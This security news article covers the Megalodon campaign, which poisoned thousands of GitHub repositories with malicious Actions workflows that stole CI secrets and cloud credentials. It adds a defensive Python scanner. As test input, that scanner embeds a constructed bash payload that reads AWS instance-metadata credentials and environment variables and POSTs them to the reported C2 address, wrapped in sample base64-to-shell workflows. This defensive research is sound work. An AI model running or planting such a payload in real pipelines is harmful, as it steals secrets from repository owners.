Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Cybersecurity researchers have disclosed Megalodon, an automated supply chain attack that pushed 5,718 malicious commits to 5,561 GitHub repositories in just six hours, stealing CI secrets, cloud credentials, and API keys.


Cybersecurity researchers have disclosed details of a sophisticated automated supply chain campaign dubbed Megalodon that pushed 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window on May 18, 2026 — one of the broadest single-day repository poisoning events ever recorded.

How the Attack Unfolded

Between 11:36 a.m. and 5:48 p.m. UTC, the threat actor injected malicious GitHub Actions workflow files containing base64-encoded bash payloads into thousands of public repositories. The attacker rotated through four seemingly innocent author names — build-bot, auto-ci, ci-bot, and pipeline-bot — along with seven generic commit messages designed to blend in with routine CI maintenance activity.

Two Distinct Payload Variants

Researchers identified two variants in the attack:

  • SysDiag (mass variant): Added a new GitHub Actions workflow triggered on every push and pull request, so it ran automatically on the next activity by any maintainer or contributor. (A run triggered by a pull_request event from a fork does not receive the repository's secrets; runs triggered by pushes from anyone with write access do.)
  • Optimize-Build (targeted variant): Overwrote existing workflow files with versions that run only on workflow_dispatch, creating dormant backdoors the attacker could fire on demand with a single GitHub REST API call (a POST to the workflow's /dispatches endpoint, using any token with write access to the repository), even after the initial injection was discovered. Because such a workflow never runs on its own, it leaves no trace in the Actions run history until it is fired.

What Was Stolen

The malicious payloads harvested a wide range of sensitive data from CI/CD environments, including:

  • CI environment variables and secrets
  • AWS instance role credentials via IMDSv2 metadata queries
  • Google Cloud and Microsoft Azure instance metadata
  • API keys, database connection strings, JWTs, and PEM private keys
  • Cloud tokens matched against more than 30 secret regex patterns
  • SSH keys and OIDC tokens

All harvested data was exfiltrated to a command-and-control server at 216.126.225.129:8443.

Notable Victim: @tiledesk/tiledesk-server

Among the confirmed impacted packages is @tiledesk/tiledesk-server, a widely used open-source customer engagement platform. The package bundled a base64-encoded bash payload within a GitHub Actions workflow file, demonstrating that even well-maintained open source projects were caught in the sweep.

Supply Chain Implications

The Megalodon campaign underscores a critical risk in modern software delivery: CI/CD pipelines are high-value targets precisely because they run automatically, unattended, with access to secrets, cloud credentials, and deployment infrastructure. The dormant workflow_dispatch variant is particularly concerning. It does not fire on push, so no run appears in the Actions history until the attacker triggers it; a cleanup that only reverts the obviously new workflow file can leave the overwritten one in place, ready to be fired silently long after the initial attack is noticed.

Recommendations

Security teams should act immediately on the following:

  • Audit every file under .github/workflows for unauthorized additions or replacements, using the git history and not only the Actions run log, since a workflow_dispatch-only workflow produces no run until it is fired. Review all commits since May 18 from the author names build-bot, auto-ci, ci-bot, and pipeline-bot, and compare each surviving workflow file against its last known-good revision.
  • Treat every secret that a run on an affected repository could reach since May 18 as compromised and rotate it, including cloud credentials obtainable through the runner VM's instance metadata service.
  • Replace long-lived secrets stored in CI with OIDC federation and short-lived cloud credentials, binding the cloud-side trust policy to the repository and branch in the token's sub claim (for example repo:ORG/REPO:ref:refs/heads/main). Note that an OIDC token minted inside a malicious run is still valid for its lifetime, so federation shrinks the blast radius rather than eliminating it.
  • Require pull-request review before changes to workflow files can reach the default branch (branch protection or rulesets, with a CODEOWNERS entry for .github/workflows so the right reviewers are mandatory), and set the default GITHUB_TOKEN permissions to read-only so a compromised workflow cannot push further commits.
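The following triage scanner is an added example, not code from the article or from the researchers who reported Megalodon. It checks workflow files for the indicators described above: a workflow that fires only on workflow_dispatch (the Optimize-Build variant), a base64 blob piped into a shell (both variants), and, inside the decoded blob, contact with instance metadata and an HTTP POST to a raw IP:port. The C2 address is the one the article reports; 169.254.169.254 is the link-local IMDS address used by AWS and Azure, and metadata.google.internal is GCP's, which the article does not name (an assumption). The two malicious sample workflows and the inner script are constructed to mirror the behaviour the article describes and are not the real payload.

```python
"""Triage scanner for GitHub Actions workflow files (added example, not the
researchers' tooling). Flags what the Megalodon write-up describes: a workflow
that fires only on workflow_dispatch, a base64 blob piped into a shell, and in
the decoded blob calls to instance metadata and POSTs to a raw IP:port."""
import base64
import re
from dataclasses import dataclass

C2_IP = "216.126.225.129"  # C2 address reported in the article
# Link-local IMDS address (AWS, Azure) and GCP's metadata hostname; the GCP
# hostname is an assumption, the article names no endpoints.
METADATA_ENDPOINTS = ("169.254.169.254", "metadata.google.internal")
B64_EXEC = re.compile(r"base64\s+(?:-d|--decode)\b[^\n|]*\|\s*(?:ba)?sh\b")
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{80,}={0,2})")
HTTP_TO_RAW_IP = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://\d{1,3}(?:\.\d{1,3}){3}:\d+")


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def parse_triggers(text: str) -> set[str]:
    """Event names under the top-level 'on:' key: 'on: push', 'on: [a, b]' or a
    nested mapping. Not a YAML parser; review anything it cannot classify."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"""^(?:on|"on"|'on'):\s*(.*)$""", line)
        if not m:
            continue
        rest = m.group(1).split("#", 1)[0].strip()
        if rest.startswith("["):
            return {e.strip().strip("'\"") for e in rest.strip("[]").split(",") if e.strip()}
        if rest:
            return {rest.strip("'\"")}
        events, child_indent = set(), None
        for nxt in lines[i + 1:]:
            if not nxt.strip() or nxt.lstrip().startswith("#"):
                continue
            indent = len(nxt) - len(nxt.lstrip(" "))
            if indent == 0:
                break  # next top-level key ends the 'on:' block
            child_indent = child_indent or indent
            key = re.match(r"^\s*([A-Za-z_]+)\s*:", nxt)
            if key and indent == child_indent:
                events.add(key.group(1))
        return events
    return set()


def scan_text(text: str) -> list[Finding]:
    """Indicator checks for any text: the workflow itself or a decoded blob."""
    found = [Finding("cloud-metadata", f"contacts instance metadata at {h}")
             for h in METADATA_ENDPOINTS if h in text]
    if C2_IP in text:
        found.append(Finding("known-c2", f"references reported C2 address {C2_IP}"))
    found += [Finding("http-to-raw-ip", m.group(0).strip()) for m in HTTP_TO_RAW_IP.finditer(text)]
    return found


def scan_workflow(text: str) -> list[Finding]:
    findings = []
    if parse_triggers(text) == {"workflow_dispatch"}:
        findings.append(Finding("dispatch-only", "fires only by hand or via the API; no run appears until then"))
    if B64_EXEC.search(text):
        findings.append(Finding("base64-exec", "decodes a base64 blob and pipes it into a shell"))
    findings += scan_text(text)
    for m in B64_BLOB.finditer(text):
        try:  # decode each long blob and scan the plaintext with the same rules
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 or not text (a long hash, a binary blob)
        findings.append(Finding("base64-blob", f"{len(m.group(1))}-char blob decodes to text"))
        findings += [Finding("decoded:" + f.rule, f.detail) for f in scan_text(decoded)]
    return findings


# Constructed stand-in for the kind of script the article describes (IMDSv2 token,
# role credentials, env dump, POST to the C2); sample input, not the real payload.
SAMPLE_PAYLOAD = """#!/bin/bash
TOK=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60')
curl -s -H "X-aws-ec2-metadata-token: $TOK" http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/.r
env >> /tmp/.r
curl -s -X POST --data-binary @/tmp/.r http://216.126.225.129:8443/ >/dev/null
"""
PAYLOAD_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()


def sample_workflow(on_block: str, step: str) -> str:
    """Minimal constructed workflow file with the given 'on:' block and one run step."""
    return f"name: x\non:\n{on_block}jobs:\n  j:\n    runs-on: ubuntu-latest\n    steps:\n      - run: {step}\n"


SYSDIAG_STYLE = sample_workflow("  push:\n  pull_request:\n", f"echo {PAYLOAD_B64} | base64 -d | bash")
DISPATCH_STYLE = sample_workflow("  workflow_dispatch:\n", f'echo "{PAYLOAD_B64}" | base64 --decode | sh')
BENIGN = sample_workflow("  push:\n    branches: [main]\n", "npm ci && npm test")

if __name__ == "__main__":
    for label, wf in (("sysdiag", SYSDIAG_STYLE), ("optimize-build", DISPATCH_STYLE), ("benign", BENIGN)):
        hits = scan_workflow(wf)
        print(f"{label}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  [{h.rule}] {h.detail}")
```

In practice, run scan_workflow over every revision of each file under .github/workflows (for example from the output of git log -p -- .github/workflows), not just the working tree, since the dormant variant is easy to miss once the noisy one has been reverted. The dispatch-only rule will also flag legitimately manual workflows, so compare each hit against the file's previous revision: a workflow that used to run on push and now runs only on workflow_dispatch is the pattern the article describes.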

Source: The Hacker News | Cybernews